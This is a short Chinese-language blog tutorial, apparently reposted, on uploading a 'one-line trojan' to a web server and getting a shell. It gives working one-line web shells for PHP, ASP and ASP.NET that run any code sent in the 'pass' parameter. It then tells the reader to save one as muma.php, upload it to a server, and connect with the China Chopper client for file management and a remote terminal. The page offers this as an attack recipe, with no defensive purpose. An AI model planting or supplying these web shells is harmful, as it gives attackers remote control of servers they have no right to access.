ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>原理:php的..._上传一句话">
当前位置:   article > 正文

上传一句话木马拿shell教程

上传一句话

0x00 前言

一句话木马:

  1. <?php @eval($_POST['pass']);?>
  2. ASP:    <%eval request("pass")%>
  3. ASP.NET:    <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

原理:

php的eval()函数:eval($str)函数是把$str当做PHP代码执行。 

0x01 实战

  1. 创建muma.php 然后将<?php @eval($_POST['pass']);?>复制进去
  2. 然后上传到服务器中

3.上菜刀链接:

右击添加:

右击文件管理:

右击虚拟终端:

 

 

0x02 遇到的问题

在下图中,两个必须相同

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/Guff_9hys/article/detail/736542
推荐阅读
相关标签
  

闽ICP备14008679号